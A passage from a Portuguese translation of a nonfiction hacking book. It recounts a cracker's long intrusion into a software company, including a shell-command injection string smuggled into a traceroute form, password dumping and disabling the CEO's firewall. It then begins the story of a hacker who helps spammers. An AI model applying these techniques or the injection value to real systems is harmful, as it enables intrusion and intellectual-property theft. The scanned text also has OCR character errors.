uma centena de computadores de seus escritórios, voce sabera disso imediatamente. Se alguem roubar 
eletronicamente sua propriedade intelectual, o que estara sendo roubado e uma cópia, e voce só sabera que 
ela desapareceu muito tempo depois (se souber), quando o prejuizo ja tiver sido causado e voce estiver 
sofrendo as consequencias. 

Entao, pode aparecer uma noticia angustiante: que as pessoas com habilidades em hacking estao 
roubando propriedade intelectual todos os dias — e com freqiiencia de empresas que provavelmente nao sao 
menos preocupadas com a seguranęa que a sua, como sugerido pelos dois exemplos deste capitulo. 



A arte de invadir 


Os dois garotos das histórias que vamos contar nesta parte pertencem a uma categoria especial referida como 
Crackers, um termo para hackers que 'invadem' software fazendo engenharia inversa de aplicativos comerciais, ou 
roubando o código-fonte desses programas de aplicativos, ou, ainda, licenciando código para que possam usar o 
software gratuitamente e ate distribui-lo em um labirinto de sites de crack do submundo. (Esse uso nao deve ser 
confundido com "cracker', um programa para quebrar senhas.) 

Em geral, ha tres motivaęoes para um cracker ir atras de determinado produto: 

• Obter um software pelo qual tenha um interesse especial e que queira examinar de perto. 

• Enfrentar um desafio e ver se pode obter vantagem de um oponente que valha a pena (geralmente o 
desenvolvedor), da mesma maneira que outra pessoa tenta obter vantagem de adversarios em xadrez, 
bridge ou póquer. 

• Divulgar o software de modo que ele seja disponibilizado a outros em um mundo on-line secreto que se 
ocupe em disponibilizar gratuitamente software valioso. Os Crackers nao estao apenas atras do software 
em si, mas tambem do código usado para gerar a chave de licenęa. 

Ambos os personagens dessas histórias estao comprometendo os fabricantes-alvo de software para roubar o 
código-fonte, de modo que possam liberar um patch ou gerador de chave ('keygen'), o código de propriedade usado 
para gerar chaves de licenęa aos clientes, para grupos de cracking que poderao usar o software gratuitamente. Ha 
muitos individuos com habilidades de hacking que estao fazendo a mesma coisa, e essas empresas de software nao 
tern ideia do quanto eles se esforęam para conseguir isso. 

Os Crackers moram num mundo sombrio, bem escondido, onde a moeda do reino e o software roubado — roubo 
de propriedade intelectual numa escala que voce provavelmente achara chocante e assustadora. O ultimo ato 
fascinante da historia e detalhado quase no firn do capitulo, na seęao "Compartilhando: o mundo de um cracker". 

O hack de dois anos 

Erik e um consultor de seguranęa de mais ou menos 30 anos que reclama: "Quando eu relato uma 
vulnerabilidade, frequentemente ouęo: 'Isso nao e nada. Grandę coisa, O que isso pode fazer?"', A historia dele 
mostra uma verdade muito ignorada: nao sao apenas os grandes erros que 
podem matar, 

Alguns dos relatos a seguir podem parecer, para aqueles que possuem conhecimento tecnico limitado sobre as 
abordagens usadas por hackers, golpes demorados demais, O que e fascinante na historia, no entanto, e a maneira 
como da revela a persistencia de muitos hackers. Os eventos contados nesta parte, acontecidos recentemente, revelam 
Erik, como tantos outros descritos nestas paginas, como um hacker etico durante o dia, que ajuda as empresas a 
proteger seus ativos de informaęao, mas seduzido pela excitaęao a noite, fazendo hacking em alvos insuspeitos. 

Erik pertence aquela categoria especial de hackers que se fixam na meta de invadir um lugar e se dedicam a tarefa 
ate conseguir... mesmo que isso leve meses ou anos. 
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A busca comeęa 

Alguns anos atras, Erik e alguns companheiros hackers de bem longe estavam coletando tipos diferentes de 
software de servidor e tinham chegado ao ponto no qual eles "obtiveram o código-fonte" de todos os principais 
produtos na categoria... com urna unica exceęao. "Aąuele era o ultimo que faltava", ele explica, "e nao sei por que, só 
me interessava invadir aquele." Entendo a atitude perfeitamente. Erik queria um trofeu de caęa, e quanto mais valioso 
o ativo, maior o trofeu. 

Aquilo que faria Erik sentir-se realizado acabou se transformando em um desafio maior do que ele esperava. "Ha 
alguns sites em que quero entrar, mas eles sao muito dificeis por alguma razao", explica ele, simplesmente. Posso 
entender essa atitude tambem. 

Ele comeęou de um modo familiar, com "urna varredura da porta do servidor Web que em geral e o primeiro 
lugar que olho quando estou tentando invadir os servidores da Web. Normalmente ha mais exposięao la. Mas eu nao 
consegui encontrar nada no comeęo". E comum investigar um alvo superficialmente quando se inicia um ataque, para 
evitar gerar alertas ou ser notado por um administrador em virtude das entradas nos logs, sobretudo hoje em dia, visto 
que muitas empresas estao executando sistemas de detecęao de invasao para localizar varreduras de porta e outros 
tipos de investigaęao que costumam ser usados pelos atacantes. 

Para Erik, "ha algumas portas pelas quais procuro porque sei que serao alvos interessantes". Ele obtem 
rapidamente urna lista de numeros para as portas usadas para o servidor Web, servięos terminais, servidor Microsoft 
SQL, VPN (Microsoft Virtual Private Network), NetBIOS, mail server (SMTP) e outras. 

Num servidor Windows, a porta 1723 (mencionada no Capitulo 7) costuma ser usada para um protocolo 
conhecido como tunel ponto a ponto, que e a implementaęao de comunicaęoes VPN da Microsoft, e usa autenticaęao 
baseada no Windows. Erik descobriu que investigar a porta 1723 "me da urna ideia do tipo de papel que o servidor 
desempenha" e tambem "'as vezes voce pode adivinhar ou quebrar senhas*'. 

Ele nem se incomoda em tentar esconder sua identidade nessa fasę porque "ha tantas varreduras de porta pelas 
quais [urna empresa] passa todo dia que ninguem nem liga. Urna varredura de porta em centenas de milhares num dia 
nao significa nada". 

(A avaliaęao de Erik em relaęao ao baixo risco de ser detectado e possivelmente identificado baseia-se na 
suposięao arriscada de que as varreduras de porta dele serao enterradas no 'ruido' da Internet, isso e verdade, os 
administradores de rede da empresa-alvo podem estar muito sobrecarregados de trabalho ou com preguięa para 
examinar os logs, mas ha sempre urna chance de que ele depare com um tipo cuidadoso e seja pego. E um risco que 
os hackers mais cautelosos nao estao dispostos a correr.) 

Apesar do risco, nesse caso as varreduras de porta nao revelaram nada util. Entao, usando um software 
construido por um cliente e que funcionava de modo muito parecido com um scanner de interface gateway comum 
(CGI), ele encontrou um arquivo log gerado pelo 'servidor WS_FTP' que continha, entre outras coisas, urna lista dos 
nomes de arquivos cujo upload tinha sido feito ao servidor. E parecido com qualquer outro FTP log (File Transfer 
Protocol), diz Erik, "exceto pelo fato de que o log foi armazenado em cada diretório no qual os arquivos foram 
carregados"; entao, 
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ąuando voce ve um arquivo listado no log que parece interessante, ele esta la — voce nao tem de sair por al 
para caęa-lo. 

Erik analisou o FTP log e encontrou os nomes de arquivos dos quais tinha sido feito um upload 
recentemente para o diretório 7 include", comumente usado para armazenar arquivos tipo ".inc" — funęoes 
comuns de programaęao que sao de outros módulos importantes de código-fonte. No padrao do Windows 
2000, esses arquivos nao sao protegidos. Depois de revisar a lista de nomes de arquivos no log, Erik usou 
seu navegador da Internet para ver o código-fonte de nomes de certos arquivos que ele achou que poderiam 
conter informaęoes valiosas. Olhou, especificamente, os arquivos que poderiam conter as senhas para um 
servidor de banco de dados back-end. E fez urna descoberta util. 

"Naquele ponto", disse Erik, "provavelmente fiz dez hits no servidor Web — sabe, ainda nada 
importante nos logs". Embora a descoberta das senhas de bancos de dados fosse excitante, ele percebeu 
rapidamente que nao havia servidor de banco de dados naquela caixa. 

Mas, de la, as coisas ficaram 'interessantes'. 

Nao consegui encontrar nada no servidor Web, mas tinha uma ferramenta [de software] que eu 
havia feito e que adivinhava os nomes de host com base numa lista de nomes comuns de host — 
como gateway, backup, test e assim por diante, mais o nome do dominio. Ela passa por uma 
lista de nomes de host comuns para identificar qualquer outro que possa existir no dominio, 

As pessoas sao bastante previsiveis [na escolha de nomes de hosts], por isso e bem Simples 
encontrar os servidores. 

Encontrar os servidores foi facil, mas isso nao o levou a lugar nenhum. Entao, ele teve uma ideia. Essa 
empresa nao ficava nos Estados Unidos. Logo, "usei aquela extensao do pais e fui tentando com varios hosts 
que havia descoberto com minha ferramenta de varredura do nome de host". Por exemplo, para uma empresa 
japonesa, seria 

hostname.companynarne.com.jp 

Aquilo o levou a descobrir um backup de Web e servidor de e-mail. Ele acessou-o com as senhas que 
tinha encontrado nos arquivos-fonte "include" (.inc). E conseguiu executar comandos por meio de um 
procedimento de sistema padrao (xp_cmdshell) que lhe permitia executar comandos shell sob qualquer 
usuario que o servidor SQL estivesse executando — geralmente sob uma conta privilegiada. Vitória! isso lhe 
deu pleno acesso de sistema ao servidor de e-mail e a Web. 

Erik prosseguiu imediatamente, vasculhando os diretórios a procura de backups do código-fonte e outros 
goodies. Seu principal objetivo era obter o keygen — como mencionado, o código de propriedade usado para 
gerar chaves de licenęa de cliente. A primeira coisa a fazer era reunir o maximo de informaęoes sobre o 
sistema e seus usuarios. Assim, Erik usou uma planilha Excel para registrar todas as informaęoes 
interessantes que encontrou, como senhas, endereęos de IP, nomes de hosts, os seryięos acessiveis por portas 
abertas e assim por diante. 
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Ele tambem explorou partes ocultas do sistema operacional que o atacante amador geralmente ignora, como 
segredos da LSA (Local Security Authority), que armazena senhas de servięo, cache hashes de senhas dos ultimos 
usuarios a entrar na maquina, nomes e contas dial-up do RAS (Remote Access Services), senhas de estaęoes de 
trabalho usadas para acesso de dominio etc. Ele tambem viu a area Protected Storage, onde o Internet Explorer e o 
Outlook Express armazenavam senhas. 1 

O próximo passo foi extrair os hashes de senha e penetrar neles para recuperar as senhas- Urna vez que o servidor 
era backup de um controlador de dominio, servidor de e-mail e servidor secundario DNS (Domain Name Service), 
ele conseguiu acessar todos os registros de recurso do DNS (inclusive nomes de host e endereęos IP correspondentes, 
entre outras coisas), abrindo o painel de gerenciamento do DNS, que continha toda a lista de nomes de dominio e de 
hosts usados pela empresa. 

Agora eu tinha uma lista de todos os hosts e reuni senhas de diversos lugares, pulando de um sistema 
para outro. 

Esse 'pequeno vóo' foi possivel em virtude de uma invasao anterior bem-sucedida que havia realizado nas senhas 
no backup do servidor Web, depois de explorar a senha Microsoft SQL que tinha obtido. 

Erik ainda nao sabia que servidores eram as maquinas de desenvolvimento de aplicativos que armazenavam os 
códigos-fonte do produto e o código de gerenciamento de licenciamento. Procurando pistas, examinou com cuidado 
os logs de mail e da Web para identificar qualquer padrao de atividade que apontasse para essas caixas. Depois de 
reunir uma lista de outros endereęos IP dos logs que pareciam interessantes, ele teria essas maquinas como alvos. O 
Santo Graal nessa fasę foi uma estaęao de trabalho do desenvolvedor, uma vez que qualquer desenvolvedor com 
certeza teria acesso a toda a coleęao de códigos-fonte de arquivos. 

Entao Erik aguardou varias semanas. Alem de coletar senhas, ele nao conseguiu obter muito mais durante alguns 
meses, "só fazendo download de informaęoes aqui e ali que achei que seriam uteis". 

O computador do CEO 

isso continuou durante cerca de oito meses, enquanto ele "pulava pacientemente de um servidor para outro", sem 
encontrar o código-fonte ou o gerador de chave de licenęa. Mas, entao, ele conseguiu um grandę avanęo. Ao olhar 
mais de perto o backup do senddor da Web que tinha comprometido, descobriu que ele armazenava os logs de 
qualquer um que recuperasse e-mails, listando o nome do usuario e o endereęo IP de todos eles. A partir de uma 
analise dos logs, ele conseguiu recuperar o endereęo IP do CEO. Finalmente, identificou um alvo valioso. 

Finalmente encontrei o computador do CEO, e isso foi bem interessante. Fiz uma yarredura de porta 
durante alguns dias e nao obtive resposta, mas sabia que o computador dele estava la. Eu podia ver nos 
cabeęalhos de e-mails que usava um endereęo IP fixo, mas ele nunca estaya la. 
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Entao, por fim tentei uma yarredura de porta da caixa dele, yerificando algumas portas 
comuns a cada duas horas para ficar fora do radar, caso ele estivesse executando qualquer tipo 
de software de intrusao-detecęao. Eu tentaya em diferentes perfodos do dia, mas limitaya o 
numero de portas a nao mais que 5 em qualquer perfodo de 24 horas, 

Levei alguns dias para realmente encontrar uma porta aberta no momento em que ele estava 
la. Ate que encontrei uma porta aberta na maquina dele — 1433 — que executava um instance 
do seryidor MS SQL. Acontece que era do laptop e ele só ficava on-line cerca de duas horas 
todas as manhas. Entao, ele entraya no escritório, verificava os e-mails e depois sala ou 
desligaya seu laptop. 

Entrando no computador do CEO 

Aąuela altura, Erik tinha reunido algo em tomo de vinte a trinta senhas da empresa. "Eles tinham senhas 
boas, fortes, mas seguiam os padrdes. E depois que eu descobrisse seus padroes, poderia adivinhar 
facilmente as senhas." 

Para atingir esse ponto, Erik estima que trabalhou durante aproximadamente um ano. E entao os esforęos 
dele foram recompensados com um importante avanęo. 

Quando Erik percebeu que havia adquirido uma noęao da estrategia de senha da empresa, atacou 
novamente o computador do CEO, fazendo tentativas para acertar a senha. O que o fazia pensar que seria 
capaz de adivinhar a senha que o CEO poderia estar usando para o MS SQL Server? 

Sabę, na yerdade nao posso explicar. E simplesmente uma capacidade que tenho de adiyinhar 
as senhas que as pessoas usam. Tambem posso saber que tipo de senhas elas usariam no futuro. 

E só uma percepęao que tenho. Posso sentir isso- E como se me tornasse eles e dissesse que 
senha usaria a seguir se eu fosse eles. 

Ele nao sabe se chama isso de sorte ou habilidade e justifica dizendo "sou um bom adivinho". Qualquer 
que seja a explicaęao, Erik realmente chegou a senha certa, da qual se lembra como "nao sendo uma palavra 
de dicionario, mas alguma coisa mais complicada". 

Independentemente da explicaęao, agora ele tinha a senha que lhe deu acesso ao seryidor SQL como um 
administrador de banco de dados. O CEO era 'dele'. 

Erik encontrou o computador bem protegido, com um firewall e apenas uma porta aberta. Mas encontrou 
muita coisa para vasculhar. "O sistema dele era realmente uma bagunęa. Eu nao conseguia encontrar nada la. 
Havia arquivos por toda parte." Sem entender a lingua estrangeira em que a maioria das coisas estava escrita, 
Erik usou alguns dicionarios on-line e uma ferramenta de traduęao gratuita chamada 'Babblefish' para buscar 
as palavras-chave. E tambem encontrou um amigo que falava a lingua do texto, o que o ajudou. Dos logs de 
chat, ele conseguiu encontrar mais endereęos de IP e mais senhas. 

Uma vez que os arquivos no laptop eram desorganizados demais para se encontrar qualquer coisa de 
valor, Erik partiu para uma abordagem diferente, usando "dir /s /od <drive letter>" para listar 
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e ordenar todos os arquivos por data, de modo que pudesse olhar aqueles acessados recentemente nos drives e 
examina-los off-line. No processo, descobriu um nome óbvio para uma planilha de Excel que continha varias senhas 
para diferentes servidores e aplicativos. Dal identificou um nome de conta valido e uma senha para o servidor DNS 
primario deles. 

Para tomar sua próxima tarefa mais simples (ganhar uma base mais firmę e lazer o upload e o download de 
arquivos com mais facilidade), ele queria passar seu kit de ferramentas de hacker para o laptop do CEO. Só 
conseguiu comunicaęao com o laptop por meio de sua conexao do servidor SQL da Microsoft, mas usou o mesmo 
procedimento armazenado mencionado antes para enviar comandos para o sistema operacional, como se estivesse a 
frente de um prompt DOS no Windows. Erik escreveu um pequeno script para que o FTP fizesse download de suas 
ferramentas de hacker. Como nada aconteceu nas tres tentativas, ele usou um programa de linha de comando que ja 
estava no laptop chamado 'pslisf para listar os processos em execuęao. 

Grandę erro! 

Uma vez que o laptop do CEO estava executando seu próprio firewall pessoal (Tiny Personal Firewall), cada 
tentativa de usar o FTP fazia aparecer uma caixa de aviso na tela do CEO, solicitando permissao para sair da 
Internet. Felizmente, o CEO ja tinha feito o download de um conjunto comum de ferramentas de linha de comando 
de www.sysintemals.com para manipular processos. Erik usou o utilitario 'pskill' para desativar o programa firewall, 
de modo que as caixas de dialogo pop-up desapareceriam antes que o CEO as visse. 

Mais uma vez, ele imaginou que seria aconselhavel aguardar algumas semanas, pois alguem poderia ter notado 
suas atividades. Quando voltou, usou uma abordagem diferente para tentar mover suas ferramentas para o laptop do 
CEO. Erik escreveu um script para recuperar varias de suas ferramentas de hacking usando um "objęto do Internet 
Explorer" que enganaria o firewall pessoal, fazendo-o acreditar que o Internet Explorer estava solicitando permissao 
para se conectar com a Internet. A maioria das pessoas permite que o Internet Explorer tenha pleno acesso pelo seu 
firewall pessoal (aposto que voce tambem permite), e Erik estava contando que seu script fosse capaz de tirar 
yantagem disso. Boa jogada. Funcionou. Entao ele conseguiu usar suas ferramentas para comeęar a buscar o laptop e 
extrair informaęoes. 

O CEO identifica uma invasao 

Esses mesmos metodos, disse Erik, ainda funcionariam hoje. 

Em outra ocasiao, embora conectado ao computador do CEO, Erik novamente desativou o firewall para poder 
transferir arquivos para outro sistema do qual conseguiria fazer seu download. Nesse processo, percebeu que o CEO 
estava no computador e deve ter notado alguma coisa estranha. "Ele viu que o leone do firewall estava faltando no 
system tray. Percebeu que eu estava la. "Erik desligou imediatamente. Depois de alguns minutos, o notebook foi 
reinicializado, e o firewall tambem. 

Eu nao sabia se ele estava conectado para me pegar. Entao esperei algumas semanas ate voltar e tentei 

de novo. Acabei aprendendo qual era sua sistematica de trabalho, quando podia entrar no sistema dele. 
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Ganhando acesso ao aplicativo 

Depois de aguardar e repensar a estrategia, Erik voltou ao laptop do CEO e comeęou a examinar o sistema com 
mais atenęao. Primeiro executou uma ferramenta de linha de comando disponivel publicamente, conhecida como 
LsaDump2, para transferir informaęoes confidenciais armazenadas numa parte especial do registro chamada LSA 
Secrets (Local Security Authority). O LSA Secrets contem senhas com letras para contas de servięo, hashes de senha 
armazenados em cache dos dez ultimos usuarios, senhas de usuarios de FTP e da Web e nomes de conta e senhas 
usadas para dial-up networking. 

Ele tambem executou o comando 'netstat' para verificar ąuais conexoes estavam estabelecidas naąuele momento 
e que portas estavam atendendo a uma conexao. Notou que havia uma porta alta que atendia a uma conexao que 
estava entrando. Ao se conectar a porta aberta do servidor de backup que havia comprometido anteriormente. Erik 
reconheceu que era um servidor Web que estava sendo usado como um tipo de interface do e-mail Ele percebeu 
rapidamente que poderia acessar a interface do e-mail e colocar qualquer arquivo no diretório root do servidor usado 
para a interface do e-mail. Entao poderia fazer com facilidade o download de arquivos do laptop do CEO para o 
servidor de backup. 

Apesar de pequenos sucessos durante o ano, Erik ainda nao tinha o código-fonte do produto nem o gerador de 
chave. Entretanto, ele nao pensava em desistir. de fato, as coisas estavam ficando interessantes. "Encontrei um 
backup do diretório 'ferramentas' do laptop do CEO. Nele havia uma interface para um gerador de chave, mas ele nao 
tinha acesso ao banco de dados no ar." 

Erik nao tinha encontrado o servidor de licenciamento que estava executando o banco de dados naquele momento 
e que continha todos os clientes principais, somente alguma coisa apontando para ele. "Eu nao sabia onde estavam 
localizadas as ferramentas de licenciamento para os funciona-rios. Precisava encontrar o servidor no ar." Ele tinha um 
palpite de que estava no mesmo servidor que seu servidor de e-mail, uma vez que a empresa operava um site Web 
que permitia aos clientes comprarem imediatamente o produto de software. Uma vez aprovada a transaęao com o 
cartao de credito, o cliente receberia um e-mail com a chave de licenciamento. Havia apenas um servidor que Erik 
nao tinha conseguido localizar e invadir ainda; devia ser aquele que tinha o aplicativo para gerar a chave de 
licenciamento. 

Erik ja tinha passado meses na rede e ainda nao havia obtido o que procurava. Decidiu examinar o servidor de 
backup que tinha comprometido antes e comeęou a escanear o servidor de e-mail dos outros servidores que ja 
'possuia' usando uma gama mais ampla de portas, na esperanęa de descobrir alguns servięos executados em portas 
que nao eram padrao. Ele tambem achou que seria melhor escanear a partir de um servidor confiavel, no caso do 
firewall, permitir apenas determinados endereęos de IP 

Por mais de duas semanas, ele escaneou a rede tao silenciosamente quanto pode para identificar quaisquer 
servidores que estivessem utilizando servięos incomuns ou na tentativa de fazer funcionar servięos comuns em portas 
que nao fossem padrao. 

Enquanto continuava a varredura de sua porta, Erik comeęou a examinar os arquivos históricos do Internet 
Explorer da conta do administrador e de varios usuarios. isso levou a uma nova descoberta. Os usuarios do servidor 
de backup estavam se conectando a uma porta de numero alto 
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no servidor de e-mail principal, usando o Internet Explorer. Ele percebeu que o servidor de e-mail principal tambem 
estava bloąueando o acesso a essa porta de numero alto, a menos que a conexao viesse de um endereęo IP 
'autorizado'. 

Finalmente, Erik descobriu um servidor Web numa porta alta — "1800 ou alguma coisa assim", lembra-se — e 
conseguiu adivinhar uma combinaęao de nome do usuario e senha que trouxe um menu de itens. Urna opęao era 
procurar informaęoes de clientes, outra era gerar chaves de licencia-mento para o produto deles. 

Bingo! 

Esse era o servidor com o banco de dados funcionando. Erik estava comeęando a sentir sua adrenalina aumentar 
ao perceber que estava perto de seu objetivo. Mas "este servidor estava realmente apertado, incrivelmente apertado". 
Mais uma vez ele tinha entrado num beco sem saida. Pensou em altemativas e teve uma outra ideia: 

Eu tinha o código-fonte para essas paginas Web por causa do backup do site Web que encontrei no 
laptop do CEO. E descobri um link na pagina Web para alguns diagnósticos de rede, como netstat, 
traceroute e ping — voce podia colocar um endereęo IP na forma web e clicar 'OK' e ele executaria o 
comando e exibiria os resultados em sua tela. 

Ele tinha notado um erro num programa que poderia executar quando fizesse o login na pagina da Web. Se 
escolhesse a opęao de fazer um comando tracert*, o programa lhe permitiria efetuar um traceroute — traęar a rota 
que os pacotes seguem ate o endereęo IP de destino. Erik percebeu que podia enganar o programa para executar um 
comando shell entrando num endereęo IP, seguido pelo simbolo e entao seu comando shell. Portanto, digitou algo 
assim: 


localhost > nul && dir c:\ 

Nesse exemplo, a informaęao entrou no form que e anexado ao comando traceroute pelo script CGI. A primeira 
parte (ate o simbolo '&') diz ao programa para fazer um comando traceroute para si mesmo (o que e inutil) e 
redirecionar a produęao para nula, o que faz com que ela seja "despejada' (ou seja, va a lugar nenhum). Depois que o 
programa executou seu primeiro comando, os simbolos '&&* indicam que ha outro comando shell a ser executado. 
Nesse caso, e um comando para exibir conteudos do diretório root no drive C — extremamente util para o atacante 
porque lhe permite executar qualquer comando shell arbitrario com os privilegios da conta na qual o servidor Web 
esta executando. 

"Isso me deu todo o acesso de que precisava", disse Erik. "Eu tinha acesso a tudo no servidor." Erik ficou ocupado. Ele 
logo notou que os desenvolvedores da empresa colocariam um backup de seu código-fonte no servidor toda noite. "Era 
uma pilha — todo o backup tinha cerca de 50 mega." Ele conseguiu executar uma serie de comandos para mover 
qualquer arquivo que quisesse 


* Utilizando-se o comando traceroute, podem-se mostrar todos os roteadores por onde as informaęoes (pacotes) 
passam para chegar a um destino (N. da R. T.). 
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para o diretório root do servidor Web e entao fazer o download deles para a primeira maąuina que tinha 
invadido, o backup do servidor Web. 

Pego! 

O incidente com o CEO tinha sido um aviso. Aparentemente, o executivo comeęou a suspeitar dele, mas, 
como estava sempre muito ocupado e Erik tomava cada vez mais cuidado, nao haveria mais alarmes. 
Entretanto, a medida que ele se aprofundou no sistema da empresa, teve mais dificuldade em passar 
despercebido, O que aconteceu depois mostra o custo de levar um hack ate as ultimas conseqiiencias, 
mantendo-se presente por longo tempo num sistema extemo. Erik estava comeęando a fazer o download do 
código-fonte do programa ha muito procurado quando... 

Eu estava no melo do caminho e notei que o download parou, Procurei no diretório e o arquivo 
tinha desaparecido. Comecei a olhar em alguns arquivos log e datas modificadas e percebi que 
alguem estava no servidor naquela hora olhando esses arquivos. Essa pessoa sabia que eu 
estava fazendo alguma coisa — em outras palavras, fui pego. 

Quem detectou a presenęa de Erik nao perdeu tempo em apagar rapidamente arquivos cruciais. O jogo 
continuava... era um jogo? 

Erik desconectou e nao voltou durante um mes. Ele lutou para conseguir o software durante varios 
meses, e voce poderia achar que estava ficando desesperado. Nao e bem assim, diz Erik* 

Eu nunca lico frustrado, porque e apenas mais um desafio. Se nao acerto na primeira, e só mais 
urna dificuldade. Certamente nao e frustrante. E muito parecido com um videogame, quando 
voce passa de um nivel para outro e de um desafio para outro. Faz parte do jogo. 

Erik pratica seu próprio tipo de fe — aquela de que a perseveranęa sempre compensa. 

Se uma coisa nao funcionava, eu tentava outra, porque sabia que algo funcionaria. Ha sempre 
alguma coisa que funciona. E só questao de descobrir o que e. 

De volta ao território inimigo 

Apesar do contratempo, cerca de um mes depois Erik estava la outra vez, conectando-se ao computador 
do CEO para dar outra olhada no chat log (na verdade, ele salvava os chat logs) para ver se alguem havia 
escrito qualquer coisa a respeito de ter soffido uma invasao. Lembrando-se do dia e da hora exata em que foi 
identificado, escaneou o log- Nao havia nenhuma menęao a um hacker ou a uma tentativa nao autorizada para 
fazer o download. Ele respirou aliviado. 

O que Erik descobriu, em vez disso, foi que tinha tido muita sorte. Praticamente naquele exato momento 
havia acontecido uma emergencia com um dos clientes da empresa. A pessoa de TI abandonou 
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tudo o que estava fazendo para resolver a situaęao. Mais tarde, Erik encontrou uma entrada que relatava que 
o sujeito tinha verificado os logs e executado um scan para detectar virus, mas nao fez nada alem disso. "Foi 
como se ele achasse que aquilo parecia suspeito. Ele observou um pouco, mas nao conseguiu explicar", 
entao nao se preocupou, 

Erik recuou e esperou um tempo para entrar novamente, mas com mais cuidado, somente em horarios 
fora do expediente, quando tinha certeza de que ninguem estaria por perto. 

Ele fez o download por partes de todo o arquivo do código-fonte por meio de um servidor intermediario 
localizado em um pais estrangeiro — e por uma boa razao, uma vez que estava fazendo tudo isso de sua 
casa. 

Erik descreveu sua familiaridade com a rede da empresa de um jeito que pode parecer pretensioso, no 
inicio, mas quando se considera o tempo que ele gastou 'caęando' as inumeras entradas e saidas do sistema 
da empresa, dando um passo por vez ate conhecer suas intimidades e peculiaridades mais ocultas, percebe-se 
que essa descrięao certamente esta dentro dos limites da credibilidade. 

Conhecia a rede deles melhor do que ninguem la, Se estivessem tendo problemas, eu 
provavelmente poderia corrigi-los melhor do que eles mesmos. isso significa que eu conhecia a 
fundo cada parte da rede, interna e externamente. 

Ainda nao chegou la 

Finalmente, Erik tinha feito o download em seu computador do código-fonte para o software do 
servidor... mas ainda nao de uma maneira que pudesse abri-lo e estuda-lo. Uma vez que o software era muito 
grandę, o desenvolvedor que o armazenou no servidor de backup o tinha compactado como um arquivo ZIP 
criptografado. Primeiro ele tentou um programa simples para quebrar a senha do ZIP, mas nao conseguiu 
fazer nenhum progresso. Hora de passar para o Piano B. 

Erik recorreu a um programa novo e aprimorado para quebrar senhas, chamado PkCrack, que usa uma 
tecnica denominada 'o ataque de texto conhecido'. Ter conhecimento de certa quantidade de dados de texto 
que fazem parte do arquivo criptografado e tudo o que se precisa para decodificar todos os demais conteudos 
do arquivo. 

Eu abri o arquivo ZIP e encontrei um arquivo Togo.tif, entao fui ao site Web principal deles, 

Hz o zip de todos e encontrei um que correspondia a mesma soma de verificaęao (checksum), 
como o arquivo ZIP protegido. 

Agora Erik tinha o arquivo ZIP protegido e uma versao nao protegida do arquivo 'logo.tif. O PKCrack 
levou apenas cinco minutos para comparar as duas versóes do mesmo arquivo e recuperar a senha. Com a 
senha, ele descompactou (unzipped) com rapidez todos os arquivos. 

Depois de longas noites, Erik finalmente conseguiu todo o código-fonte que procurava ha tanto tempo. 

O que o fez insistir nessa tarefa por tanto tempo? Erik explica: 



A arte de irwadir 


Ah, e facil, e como ser sexy. Gosto de um desaflo e gosto de nao ser detectado. Gosto de fazer as coisas 
de um modo diferente, e bem silenciosamente. Gosto de encontrar as maneiras mais criatiyas de fazer 
alguma coisa. Com certeza, fazer um upload de um script e mais facil, mas do meu jeito era muuuuito 
mais legał. Nao seja um script kiddie se voce puder evitar isso — seja um hacker. 

E o que ele fez com o software e o gerador de chave? A resposta e que ele e Robert, o herói da historia a seguir, 
seguem a mesma rotina, que e comum entre muitos Crackers do mundo. Voce encontrara a historia na seęao 
"Compartilhando: o mundo de um cracker", no finał do capitulo. 

Robert, o amigo do Spammer 

Na distante Australia mora outro daqueles profissionais de seguranęa respeitados de dia e hackers black-hats* a 
noite, aperfeięoando as habilidades que pagam o financiamento de sua casa, fazendo hacking nas empresas de 
software mais resistentes do planeta, 

Mas esse homem, Robert, nao pode ser incluido facilmente em urna categoria. Ele parece complexo demais para 
isso — num mes, ele faz hack de um software, para divertir-se e satisfazer sua necessidade de enfrentar um desafio, e 
no mes seguinte assume um projeto bem pago que algumas pessoas iriam definir, como ele mesmo o denomina, "um 
spammer sujo". Nao sujo, voce descobrira, só porque ele ocasionalmente trabalhou como spammer**; sujo por causa 
do tipo de spamming que fez. 

"Ganhar dinheiro com hacking", diz ele, "e um conceito". Isso pode ser só urna justificativa, mas ele nao teve 
receio de dividir a historia conosco. Na verdade, Robert a contou espontaneamente. E chamou a atenęao para ela ao 
inventar um termo: "Acho que voce poderia dizer que sou um spacker — um hacker que trabalha para spammers". 

Fui procurado por um amigo meu que disse: "Quero vender um porno bondage a milhares de pessoas. 
Preciso ter milhoes e milhóes de endereęos de e-mails de pessoas que queiram esse tipo de coisa". 

Voce ou eu poderiamos ter corrido diante dessa sugestao. Robert "pensou nisso durante um tempo" e entao 
decidiu dar urna olhada no que poderia estar envolvido. "Procurei todos esses sites de bondage que envolvem 
sadismo", diz ele, admitindo que fez isso apesar de "desagradar muito minha namorada". Ele conduziu a busca de 
urna maneira perfeitamente objetiva: por meio do Google e tambem de outro portal de busca, www.copemic.com, 
que usa varios mecanismos de busca. 

Os resultados fomeceram urna lista funcional. "A unica coisa que quero desses [sites| e saber quem gosta de 
pomó bondage, quem quer receber atualizaęoes deles, quem se interessa por essa porcaria," Se Robert ia ajudar a criar 
spam, ele nao tinha intenęao de fazer isso "como fazem os idiotas", que enviam centenas de e-mails a todos, ate para o 
próprio irmao, sem eles demonstrarem o minimo interesse pelo assunto. 

* Black-hats sao praticantes de crimes de informatica. e a denominaęao generica para Crackers (N. da R. T.). lndividuo 

* que envia spams (N. da R. T.). 

H2 
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Obtendo mailing lists 

Robert descobriu que muitos sites Web que envolvem bondage — submissao do parceiro por meio de 
imobilizaęao, especie de sadomasoquismo light — usavam um importante aplicativo para gerenciar mailing 
lists de assinantes, que chamarei de Lista de Assinantes. 

Usando o Google eu tinha encontrado alguem que havia pedido uma cópia dela [Lista de 
Assinantes], e a coloąuei no servidor Web, Acho que foi um site Web em Taiwan ou na China. 

A próxima etapa foi ainda mais facil do que ele poderia ter previsto: 

O servidor Web deles estava configurado incorretamente. Qualquer usuario poderia ver o 
[código] fonte do software- Nao era a ultima versao do software, mas uma versao razoavelmente 
recente. 

O erro foi que alguem tinha, por descuido ou acidente, deixado um arquivo compactado do código-fonte 
no documento root do servidor Web. Robert fez o download do código-fonte. 

Com esse programa e os nomes, ele iria capturar informaęóes dos sites existentes, Robert imaginou; 

Eu seria capaz de enviar e-mails dizendo: "Volte ao meu site. estamos apresentando um 
especial sobre chicoteamento — e e pela metade do preęo". Muita gente faz assinatura dessas 
coisas. 

Ate aqui, no entanto, ele tinha um software de mailing list, mas ainda nao possuia mailing lists. 

